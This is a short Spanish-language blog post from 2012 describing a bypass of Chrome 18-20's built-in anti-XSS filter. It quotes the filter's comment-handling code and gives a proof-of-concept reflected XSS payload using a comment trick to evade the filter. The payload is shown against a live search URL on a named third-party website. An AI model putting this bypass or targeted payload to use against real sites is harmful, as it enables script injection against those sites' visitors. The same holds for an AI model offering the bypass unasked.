ByPass Anti-XSS de Chrome V. 18 | 19 | 20 | @Pwnakil

Se habrán percatado que cuando intentamos aprovechar un XSS no persistente, en el navegador Chrome no funciona, puesto que el filtro Anti-Xss que tiene nos impide inyectar dicho código.

Comparemos, en FireFox no tiene un filtro anti-xss

Y Chrome si:

El filtro Xss se da en esta porción de código:

else if (startsMultiLineCommentAt(string, startPosition)) {
            if ((foundPosition = string.find("*/", startPosition)) != notFound)
                startPosition = foundPosition + 2; /*<--- para saltearnos el filtro anti-xss, tenemos que poner mas de 2 caracteres entre los comentarios*/

PoC:

Xss: <script>/*///*/alert('@Pwnakil');</script>

Target: http://www.minecraftserverfinder.com/search.php?search=<script>/*///*/alert('@Pwnakil')</script>

@Pwnakil | Cl - Security

sábado, 13 de octubre de 2012

ByPass Anti-XSS de Chrome V. 18 | 19 | 20

No hay comentarios:

Publicar un comentario